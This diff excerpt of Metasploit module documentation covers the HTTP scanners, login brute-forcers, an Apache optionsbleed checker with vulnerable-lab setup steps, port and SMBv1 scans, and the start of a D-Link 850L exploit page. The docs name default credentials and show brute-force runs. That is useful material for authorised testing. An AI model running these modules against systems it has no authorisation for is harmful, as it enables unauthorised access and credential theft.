[+] 1.1.1.1:70 - Text file: Foo File
[+] 1.1.1.1:70 - Path: 1.1.1.1:70/foobar.txt
[+] 1.1.1.1:70 - Directory: msf
[+] 1.1.1.1:70 - Path: 1.1.1.1:70/msf
[+] 1.1.1.1:70 - HTML: metasploit homepage
[+] 1.1.1.1:70 - Path: 1.1.1.1:70/URL:http://metasploit.com/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,148 @@
## Description
This module scans for the Apache optionsbleed vulnerability where the Allow response header
returned from an OPTIONS request may bleed memory if the server has a .htaccess file
with an invalid Limit method defined.
### Vulnerable Application Setup
This setup is slightly more complex than a default instance, but potentially gives more interesting results. It is more or less based on a
blog post by [securitysift.com](https://www.securitysift.com/testing-optionsbleed/).
This setup was performed on an Ubuntu 16.04 server with apache 2.4.18-2ubuntu3.1.
Apache was patched in [2.4.18-2ubuntu3.5](https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-9798.html)
1. First thing we'll do is create 2 virtual host directories with content
```
sudo mkdir -p /var/www/html/s1
sudo mkdir -p /var/www/html/s2
echo "<Limit method0 method1 method2 method3 method4 method5>
Allow from all
</Limit>" | sudo tee /var/www/html/s1/.htaccess
echo "
<html>
<h1>Attacker</h1>
</html>
" | sudo tee /var/www/html/s1/index.html
echo "
<?php
\$user = \$_POST[\"username\"];
\$pwd = \$_POST[\"password\"];
\$otherdata = \$_POST[\"otherdata\"];
?>
<form action=\"index.php\" method=\"POST\">
Otherdata: <input type=\"text\" name=\"otherdata\"><br>
Username: <input type=\"text\" name=\"username\"><br>
Password: <input type=\"text\" name=\"password\"><br>
<input type=\"submit\" value=\"Submit\">
</form>
" | sudo tee /var/www/html/s2/index.php
```
2. Now we'll modify apache to have 2 virtual hosts, an attacker on port 80 and victim on port 81
```
sudo echo "Listen 80
Listen 81
<VirtualHost *:81>
#victim
DocumentRoot /var/www/html/s2
ErrorLog \${APACHE_LOG_DIR}/error_victim.log
CustomLog \${APACHE_LOG_DIR}/access_victim.log combined
</VirtualHost>
<VirtualHost *:80>
#attacker
DocumentRoot /var/www/html/s1
ErrorLog \${APACHE_LOG_DIR}/error_attacker.log
CustomLog \${APACHE_LOG_DIR}/access_attacker.log combined
<Directory /var/www/html/s1>
AllowOverride All
</Directory>
</VirtualHost>
" | sudo tee /etc/apache2/sites-enabled/000-default.conf
```
3. Restart the service
```sudo service apache2 restart```
4. We'll want to generate some traffic to the victim, so we'll use an infinite loop to send fake login requests
```
while true; do curl -d "otherdata=otherdata&username=admin&password=passw0rd" -X POST -s http://[IP]:81/index.php > /dev/null; done
```
Now you have 2 virtual hosts, a vulnerable `.htaccess` file on port 80 in root, and memory being churned to simulate a live host.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/apache_optionsbleed```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Scenarios
### Using the setup mentioned previously
```
[*] Processing optionsbleed.rc for ERB directives.
resource (optionsbleed.rc)> use auxiliary/scanner/http/apache_optionsbleed
resource (optionsbleed.rc)> set rhosts 192.168.2.104
rhosts => 192.168.2.104
resource (optionsbleed.rc)> set threads 10
threads => 10
resource (optionsbleed.rc)> run
[+] Request 1: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,<2C><>)<01>~,HEAD,,HEAD,POST
[+] Request 2: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,,HEAD,<2C><><01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,POST
[+] Request 3: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,8<>)<01>~,HEAD,POST
[+] Request 4: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C>4<01>~,<2C><><01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,,HEAD,,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 5: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C><><01>~,,HEAD,,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 6: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,POST
[+] Request 7: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,,HEAD,<2C><><01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 8: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,,HEAD,<2C>4<01>~,<2C><><01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 9: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C><><01>~,,HEAD,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 10: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 11: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C>4<01>~,<2C><><01>~,,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,POST
[+] Request 13: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C>T<01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 14: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C><01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,,HEAD,allow,HEAD,,HEAD,,HEAD,POST
[+] Request 15: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,8<>)<01>~,HEAD,POST
[+] Request 16: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C>4<01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 18: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,,HEAD,<2C>T<01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,<2C><>)<01>~,HEAD,,HEAD,POST
[+] Request 19: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,,HEAD,<2C>T<01>~,<2C>4<01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,,HEAD,POST
[+] Request 20: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C>T<01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,<2C><>)<01>~,HEAD,,HEAD,POST
[+] Request 21: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C>4<01>~,,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,POST
[+] Request 22: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,<2C><><01>~,<2C>T<01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,POST
[+] Request 23: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,,HEAD,<2C>4<01>~,<2C><><01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,POST
[+] Request 24: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,<2C><>)<01>~,HEAD,,HEAD,POST
[+] Request 25: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C>T<01>~,<2C><><01>~,,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,POST
[+] Request 26: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,<2C><>)<01>~,HEAD,,HEAD,POST
[+] Request 27: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,<2C>4<01>~,<2C><><01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 28: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,,HEAD,allow,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,allow,HEAD,POST
[+] Request 29: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,allow,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 30: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>4<01>~,8<>)<01>~,HEAD,POST
[+] Request 31: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C><><01>~,<2C>T<01>~,,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,POST
[+] Request 32: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,,HEAD,<2C>4<01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,POST
[+] Request 33: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,<2C><><01>~,<2C><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 34: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,<2C>4<01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 35: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C><><01>~,<2C><><01>~,<2C><><01>~,,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,,HEAD,POST
[+] Request 36: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C>4<01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
[+] Request 38: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,POST
[+] Request 39: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,<2C><><01>~,<2C><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,allow,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,POST
[+] Request 40: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C><><01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,,HEAD,allow,HEAD,,HEAD,,HEAD,POST
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Cleanup
If the server is NOT vulnerable, the apache error logs will contain an entry similar to this:
```
[Wed Sep 27 19:54:43.183978 2017] [core:alert] [pid 17659] [client 2.2.2.2:43546] /var/www/html/s1/.htaccess: Could not register method 'method0' for <Limit from .htaccess configuration, referer: http://1.1.1.1/
```

View File

@ -0,0 +1,59 @@
## Description
This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
## Vulnerable Application
[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
[Inedo website](http://inedo.com/)
## Verification Steps
1. Do: ```use auxiliary/scanner/http/buildmaster_login```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: Set credentials
5. Do: ```run```
6. You should see the module attempting to log in.
## Scenarios
### Attempt to login with the default credentials.
```
msf > use auxiliary/scanner/http/buildmaster_login
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
RHOSTS => 10.0.0.39
msf auxiliary(buildmaster_login) > run
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(buildmaster_login) >
```
### Brute force with credentials from file.
```
msf > use auxiliary/scanner/http/buildmaster_login
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
RHOSTS => 10.0.0.39
msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
USERPASS_FILE => ~/BuildMasterCreds.txt
msf auxiliary(buildmaster_login) > run
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test"
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test"
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong"
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong"
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(buildmaster_login) >
```

View File

@ -0,0 +1,72 @@
## Description
This module identifies the existence of interesting files in a given directory path.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/files_dir```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Scenarios
**Running the scanner**
```
msf > use auxiliary/scanner/http/files_dir
msf auxiliary(files_dir) > show options
Module options (auxiliary/scanner/http/files_dir):
Name Current Setting Required Description
---- --------------- -------- -----------
DICTIONARY /root/Framework/msf/metasploit-framework/data/wmap/wmap_files.txt no Path of word dictionary to use
EXT no Append file extension to use
PATH / yes The path to identify files
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(files_dir) > set RHOSTS 192.168.0.155
RHOSTS => 192.168.0.155
msf auxiliary(files_dir) > run
[*] Using code '404' as not found for files with extension .null
[*] Using code '404' as not found for files with extension .backup
[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .c
[*] Using code '404' as not found for files with extension .cfg
[*] Using code '404' as not found for files with extension .class
[*] Using code '404' as not found for files with extension .copy
[*] Using code '404' as not found for files with extension .conf
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[*] Found http://192.168.0.155:80/index.html 200
[*] Using code '404' as not found for files with extension .htm
[*] Using code '404' as not found for files with extension .ini
[*] Using code '404' as not found for files with extension .log
[*] Using code '404' as not found for files with extension .old
[*] Using code '404' as not found for files with extension .orig
[*] Using code '404' as not found for files with extension .php
[*] Using code '404' as not found for files with extension .tar
[*] Using code '404' as not found for files with extension .tar.gz
[*] Using code '404' as not found for files with extension .tgz
[*] Using code '404' as not found for files with extension .tmp
[*] Using code '404' as not found for files with extension .temp
[*] Using code '404' as not found for files with extension .txt
[*] Using code '404' as not found for files with extension .zip
[*] Using code '404' as not found for files with extension ~
[*] Using code '404' as not found for files with extension
[*] Found http://192.168.0.155:80/blog 301
[*] Found http://192.168.0.155:80/index 200
[*] Using code '404' as not found for files with extension
[*] Found http://192.168.0.155:80/blog 301
[*] Found http://192.168.0.155:80/index 200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(files_dir) >
```

View File

@ -0,0 +1,46 @@
## Description
This module shows HTTP Headers returned by the scanned systems.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/http_header```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Scenarios
**Running the scanner**
```
msf > use auxiliary/scanner/http/http_header
msf auxiliary(http_header) > show options
Module options (auxiliary/scanner/http/http_header):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP_METHOD HEAD yes HTTP Method to use, HEAD or GET (Accepted: GET, HEAD)
IGN_HEADER Vary,Date,Content-Length,Connection,Etag,Expires,Pragma,Accept-Ranges yes List of headers to ignore, seperated by comma
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI to use
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(http_header) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(http_header) > run
[+] 192.168.56.101:80 : CONTENT-TYPE: text/html
[+] 192.168.56.101:80 : SERVER: Apache/2.2.8 (Ubuntu) DAV/2
[+] 192.168.56.101:80 : X-POWERED-BY: PHP/5.2.4-2ubuntu5.10
[+] 192.168.56.101:80 : detected 3 headers
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(http_header) >
```

View File

@ -0,0 +1,72 @@
## Description
This module is a brute-force login scanner that attempts to authenticate to a system using HTTP authentication.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/http_login```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Scenarios
**Running the scanner**
```
msf > use auxiliary/scanner/http/http_login
msf auxiliary(http_login) > show options
Module options (auxiliary/scanner/http/http_login):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTH_URI no The URI to authenticate against (default:auto)
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/http_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST
msf auxiliary(http_login) > set AUTH_URI /xampp/
AUTH_URI => /xampp/
msf auxiliary(http_login) > set RHOSTS 192.168.1.201
RHOSTS => 192.168.1.201
msf auxiliary(http_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(http_login) > run
[*] Attempting to login to http://192.168.1.201:80/xampp/ with Basic authentication
[+] http://192.168.1.201:80/xampp/ - Successful login 'admin' : 's3cr3t'
[*] http://192.168.1.201:80/xampp/ - Random usernames are not allowed.
[*] http://192.168.1.201:80/xampp/ - Random passwords are not allowed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(http_login) >
```
**Checking the credentials stored**
```
msf auxiliary(http_login) > creds
Credentials
===========
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
192.168.1.201 192.168.1.201 80/tcp (http) admin s3cr3t Password
msf auxiliary(http_login) >
```

View File

@ -0,0 +1,40 @@
## Description
This module displays the version information about each system.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/http_version```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Scenarios
**Running the scanner**
```
msf > use auxiliary/scanner/http/http_version
msf auxiliary(http_version) > show options
Module options (auxiliary/scanner/http/http_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(http_version) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(http_version) > run
[+] 192.168.56.101:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(http_version) >
```

View File

@ -0,0 +1,52 @@
## Description
Checks if an HTTP proxy is open. False positives are avoided by verifying the HTTP return code and matching a pattern. The CONNECT method is verified only by the return code. HTTP headers are shown regarding the use of proxies or load balancers.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/open_proxy```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Scenarios
### Running the scanner :
```
msf > use auxiliary/scanner/http/open_proxy
msf auxiliary(open_proxy) > show options
Module options (auxiliary/scanner/http/open_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECKURL http://www.google.com yes The web site to test via alleged web proxy
MULTIPORTS false no Multiple ports will be used: 80, 443, 1080, 3128, 8000, 8080, 8123
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads
VALIDCODES 200,302 yes Valid HTTP code for a successfully request
VALIDPATTERN <TITLE>302 Moved</TITLE> yes Valid pattern match (case-sensitive into the headers and HTML body) for a successfully request
VERIFYCONNECT false no Enable CONNECT HTTP method check
VHOST no HTTP server virtual host
msf auxiliary(open_proxy) > set RHOSTS 192.168.1.200-210
RHOSTS => 192.168.1.200-210
msf auxiliary(open_proxy) > set RPORT 8888
RPORT => 8888
msf auxiliary(open_proxy) > set THREADS 11
THREADS => 11
msf auxiliary(open_proxy) > run
[*] 192.168.1.201:8888 is a potentially OPEN proxy [200] (n/a)
[*] Scanned 02 of 11 hosts (018% complete)
[*] Scanned 03 of 11 hosts (027% complete)
[*] Scanned 04 of 11 hosts (036% complete)
[*] Scanned 05 of 11 hosts (045% complete)
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(open_proxy) >
```

View File

@ -0,0 +1,91 @@
# Description
This module is used to determine if the ports on target machine are closed. It sends probes containing the FIN, PSH and URG flags. Scan is faster and stealthier compared to some other scans. Following action are performed depending on the state of ports -
#### OPEN|FILTERED Port:
Detects open|filtered port via no response to the segment
#### Closed Port:
Detects a closed port via a RST received in response to the FIN
# Required Permissions
XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
# Options
**PORTS**
This is the list of TCP ports to test on each host.
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
options is to scan `1-10000` ports.
**Timeout**
This options states the reply read timeout in milliseconds. Default value if `500`.
**RHOSTS**
The target address range is defined in this option.
**VERBOSE**
Gives detailed message about the scan of all the ports. It also shows the
ports that were not open/filtered.
# Verification Steps
1. Do: `use auxiliary/scanner/portscan/xmas`
2. Do: `set RHOSTS [IP]`
3. Do: `set PORTS [PORTS]`
4. Do: `run`
5. The open/filtered ports will be discovered, status will be printed indicating as such.
# Scenarios
### Metaspliotable 2
```
msf > use auxiliary/scanner/portscan/xmas
msf auxiliary(xmas) > set rhosts 192.168.45.159
rhosts => 192.168.45.159
msf auxiliary(xmas) > set ports 1-100
ports => 1-100
msf auxiliary(xmas) > run
[*] TCP OPEN|FILTERED 192.168.45.159:1
[*] TCP OPEN|FILTERED 192.168.45.159:3
[*] TCP OPEN|FILTERED 192.168.45.159:5
[*] TCP OPEN|FILTERED 192.168.45.159:8
[*] TCP OPEN|FILTERED 192.168.45.159:12
[*] TCP OPEN|FILTERED 192.168.45.159:14
[*] TCP OPEN|FILTERED 192.168.45.159:16
[*] TCP OPEN|FILTERED 192.168.45.159:19
[*] TCP OPEN|FILTERED 192.168.45.159:21
[*] TCP OPEN|FILTERED 192.168.45.159:37
[*] TCP OPEN|FILTERED 192.168.45.159:39
[*] TCP OPEN|FILTERED 192.168.45.159:41
[*] TCP OPEN|FILTERED 192.168.45.159:43
[*] TCP OPEN|FILTERED 192.168.45.159:49
[*] TCP OPEN|FILTERED 192.168.45.159:52
[*] TCP OPEN|FILTERED 192.168.45.159:53
[*] TCP OPEN|FILTERED 192.168.45.159:55
[*] TCP OPEN|FILTERED 192.168.45.159:57
[*] TCP OPEN|FILTERED 192.168.45.159:59
[*] TCP OPEN|FILTERED 192.168.45.159:61
[*] TCP OPEN|FILTERED 192.168.45.159:63
[*] TCP OPEN|FILTERED 192.168.45.159:65
[*] TCP OPEN|FILTERED 192.168.45.159:67
[*] TCP OPEN|FILTERED 192.168.45.159:69
[*] TCP OPEN|FILTERED 192.168.45.159:73
[*] TCP OPEN|FILTERED 192.168.45.159:89
[*] TCP OPEN|FILTERED 192.168.45.159:91
[*] TCP OPEN|FILTERED 192.168.45.159:93
[*] TCP OPEN|FILTERED 192.168.45.159:95
[*] TCP OPEN|FILTERED 192.168.45.159:97
[*] TCP OPEN|FILTERED 192.168.45.159:99
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,55 @@
# Description
This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
```PC NETWORK PROGRAM 1.0
LANMAN1.0
Windows for Workgroups 3.1a
LM1.2X002
LANMAN2.1
NT LM 0.12
```
If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
If the SMB server does not support SMBv1 a RST will be sent.
___
# Usage
The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
#### A host that does support SMBv1.
```
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
msf auxiliary(smb1) > set RHOSTS x.x.x.x
RHOSTS => x.x.x.x
msf auxiliary(smb1) > run
[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb1) > services -S x.x.x.x
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
x.x.x.x 445 tcp smb1 open
```
#### A host that does not support SMBv1
```
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
msf auxiliary(smb1) > set RHOSTS y.y.y.y
RHOSTS => y.y.y.y
msf auxiliary(smb1) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
___
## Options
The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```.

View File

@ -0,0 +1,64 @@
The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands via an authenticated OS command injection
vulnerability. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07
are potentially vulnerable. The vulnerability seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop.
## Vulnerable Application
1. Start msfconsole
2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb`
